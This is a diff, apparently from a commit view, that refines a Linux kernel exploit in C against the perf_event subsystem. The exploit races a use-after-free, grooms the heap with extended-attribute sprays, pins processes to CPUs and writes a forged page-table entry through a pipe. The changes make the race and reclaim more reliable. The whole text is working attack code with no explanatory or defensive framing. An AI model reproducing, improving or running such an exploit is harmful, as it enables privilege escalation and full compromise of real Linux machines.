@@ -285,6 +285,7 @@ void print_proc_self_maps_raw() {
285285 close (fd );
286286}
287287
288+ int counter_init = 0 ;
288289void race (int group_leader ) { // caller must have ownership of the group
289290 int pipefd [2 ];
290291 uint64_t buf [0x2000 ] = {0 , };
@@ -299,33 +300,39 @@ void race(int group_leader) { // caller must have ownership of the group
299300 perror ("reclaim failed" );
300301 exit (EXIT_FAILURE );
301302 }
303+
302304 pid_t child_pid = fork ();
303305 if (child_pid == 0 ) { // child read
304306 _pin_to_cpu (CPU_A );
305307 sched_yield ();
306308 DEBUG_PRINT ();
307309 raise (SIGSTOP ); // stop - keep same generation
308310 for (int i = 0 ; i < 512 + 511 ; i ++ ){
309- ioctl (siblings [i ], PERF_EVENT_IOC_RESET , 0 );
311+ ioctl (siblings [i ], PERF_EVENT_IOC_RESET , PERF_IOC_FLAG_GROUP );
310312 ioctl (siblings [i ], PERF_EVENT_IOC_ENABLE , 0 );
311313 }
312314 if (close (siblings [100 ]) < 0 ) {
313315 perror ("close failed" );
314316 exit (EXIT_FAILURE );
317+ }
318+ char * addr ;
319+ if (!counter_init ) { // preserving previously recorded counters.
320+ puts ("[+] Initializing Counters" );
321+ addr = (char * )mmap (NULL , 0x1000 * 0x80 , PROT_READ | PROT_WRITE , MAP_PRIVATE | MAP_ANONYMOUS , -1 , 0 );
322+ for (int i = 0 ; i < 0x80 ; i ++ ){
323+ ioctl (group_leader , PERF_EVENT_IOC_ENABLE , 0 );
324+ addr [0x1000 * i ] = 0x41 ;
325+ ioctl (group_leader , PERF_EVENT_IOC_DISABLE , 0 );
326+ }
315327 }
316- ioctl (group_leader , PERF_EVENT_IOC_RESET , 0 );
317-
318- char * addr = (char * )mmap (NULL , 0x1000 * 0x80 , PROT_READ | PROT_WRITE , MAP_PRIVATE | MAP_ANONYMOUS , -1 , 0 );
319- for (int i = 0 ; i < 0x80 ; i ++ ){
320- ioctl (group_leader , PERF_EVENT_IOC_ENABLE , 0 );
321- addr [0x1000 * i ] = 0x41 ;
322- ioctl (group_leader , PERF_EVENT_IOC_DISABLE , 0 );
323- }
328+
324329 write (pipefd [1 ], buffer , 1 ); // sync point A
325330 remove_xattr ("security.x12296_10" , 1 );
331+ // x10 reclaimed by CPU_B is now released on CPU_A
326332 for (int _ = 0 ; _ < 1 ; _ ++ ) {
327333 read (group_leader , buf , sizeof (buf ));
328334 }
335+ sched_yield ();
329336 remove_xattr ("security.ssiphim" , 1 );
330337 if (setxattr ("/tmp/x1" , "security.x12296_10" , buf , 0x3008 , 0 ) < 0 ) {
331338 perror ("reclaim failed" );
@@ -334,7 +341,9 @@ void race(int group_leader) { // caller must have ownership of the group
334341 uint64_t pte = 0x8000000000000067 ;
335342 write (vuln_pipe [1 ], & pte , 8 );
336343 read (vuln_pipe [0 ], & pte , 8 );
337- munmap (addr , 0x1000 * 0x80 );
344+ if (!counter_init ) {
345+ munmap (addr , 0x1000 * 0x80 );
346+ }
338347 exit (0 );
339348 }
340349 else if (child_pid > 0 ) { // parent
@@ -377,6 +386,8 @@ void race(int group_leader) { // caller must have ownership of the group
377386 }
378387 // DEBUGDEBUG - not
379388 waitpid (child_pid , & status , 0 );
389+ if (!counter_init )
390+ counter_init = 1 ;
380391
381392 close (pipefd [0 ]);
382393 close (pipefd [1 ]);
@@ -451,14 +462,21 @@ pid_t add_siblings_fork(int group_leader, int cnt, int ctx_pid, int is_racer){
451462 exit (EXIT_FAILURE );
452463 }
453464 if (is_racer ) {
465+ _pin_to_cpu (CPU_B );
466+ sched_yield ();
467+ // Minimizing heap noise.
468+ // child will be running on CPU_A
454469 spray_xattr_page (0x3008 , 12 , 1 ); // 12296
455470 spray_xattr_page (0x4008 , 2 , 1 ); // 16392
456471 remove_xattr ("security.x16392_0" , 1 );
457472 remove_xattr ("security.x16392_1" , 1 );
458473 remove_xattr ("security.x12296_5" , 1 );
459474 remove_xattr ("security.x12296_6" , 1 );
475+ sched_yield ();
476+ // this reclaim process must be atomic
460477 remove_xattr ("security.x12296_11" , 1 );
461478 resize_pipe (vuln_pipe [1 ], 0x1000 * 220 );
479+ sched_yield ();
462480 remove_xattr ("security.x12296_10" , 1 );
463481 remove_xattr ("security.x12296_7" , 1 );
464482 if (setxattr ("/tmp/x1" , "security.x12296_10" , buf , 0x3008 , 0 ) < 0 ) {
0 commit comments